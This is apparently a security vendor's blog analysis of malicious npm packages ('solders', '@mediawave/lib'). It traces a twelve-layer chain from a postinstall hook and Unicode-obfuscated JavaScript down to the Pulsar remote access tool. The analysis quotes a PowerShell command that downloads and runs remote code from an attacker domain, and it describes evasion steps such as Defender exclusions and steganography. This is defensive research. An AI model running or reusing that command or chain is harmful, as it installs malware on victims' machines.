Hidden under layers of obfuscation, an npm package delivers a remote access tool.
In the ever-vigilant effort to secure the open-source ecosystem, Veracode’s continuous monitoring systems recently flagged a pair of npm malware packages—solders and @mediawave/lib. The malicious behavior, however, is not at all obvious at first because of a layer of unusual Unicode obfuscation that caught our attention. Our investigation focused on the solders package, which leverages a common yet critical attack vector: a postinstall script in its package.json. This hook means that simply installing the package is enough to trigger its hidden malicious payload.
Upon inspection, the target lib.js file presented itself not as typical code, but as a dizzying wall of Unicode characters, predominantly Japanese Katakana and Hiragana. This was far more than simple character substitution; it was the entry point to a deeply layered and complex malicious attack chain. What began as an analysis of a single, clever JavaScript obfuscation technique quickly spiraled into a deep-dive that traversed multiple programming languages, downloader stages, and even steganography. Join us as we peel back each layer of this remarkably elaborate attack, following the trail from a few cryptic symbols all the way down to its final RAT payload.
TL;DR
If you’re just here for the highlights and want to see the full, multi-layered attack chain in a concise format, please scroll down to the “Recap: The Anatomy of a Multi-Layered Attack” section. There, we detail each of the twelve layers we had to unravel to get to the bottom of this threat.
This investigation revealed a remarkably deep and complex attack chain. To fully appreciate the attacker’s efforts to evade detection, here is a step-by-step summary of the layers we unraveled:
Layer 1: NPM postinstall Hook: The attack begins with a standard postinstall script in the package.json file, automatically executing the malware upon installation.
Layer 2: Unicode Obfuscated JavaScript: The initial lib.js payload is obfuscated using Japanese Hiragana and Katakana characters as variable names, making static analysis nearly impossible at a glance.
Layer 3: Dynamically Reconstructed JavaScript: This Unicode script is not a direct payload, but a program designed to dynamically build primitives (e.g., ‘t’, ‘r’, ‘u’, ‘e’) and reconstruct the Function constructor from scratch.
Layer 4: Second-Stage Obfuscated JavaScript: The Unicode layer dynamically assembles and executes a second, more traditionally obfuscated JavaScript payload that uses array shuffling and hex encoding.
Layer 5: PowerShell Downloader: Once deobfuscated, the JavaScript’s sole purpose is to execute a short PowerShell command (iwr firewall[.]tel | iex) to download and execute the next stage from a remote server.
Layer 6: Binary-Encoded PowerShell Script: The script hosted at firewall[.]tel is itself obfuscated, with the payload encoded as arrays of binary strings that are converted to ASCII characters and executed.
Layer 7: Base64-Encoded PowerShell Script: Deobfuscating the binary strings reveals another PowerShell script. This one uses Base64 encoding to hide its commands which include adding Windows Defender exclusions and downloading a malicious batch file.
Layer 8: Obfuscated Batch File: The downloaded output.bat (nearly 1MB in size) uses extensive obfuscation, setting hundreds of random environment variables and then concatenating them in a specific order.
Layer 9: Encrypted & Compressed .NET DLL: The batch script’s true payload is a Base64-encoded, 3DES-encrypted, and Gzip-compressed .NET DLL, which is reconstructed and loaded directly into memory.
Layer 10: Steganography: This first .NET DLL is not the final payload. It reaches out to a 3MB PNG image file hosted online and uses steganography techniques to extract hidden data from the image.
Layer 11: Second .NET DLL (The RAT): The data extracted from the image is used to build a second .NET DLL in memory.
Layer 12: Final Payload Deployment: This final DLL is the Pulsar RAT, a remote administration tool that gives the attacker full control over the victim’s machine.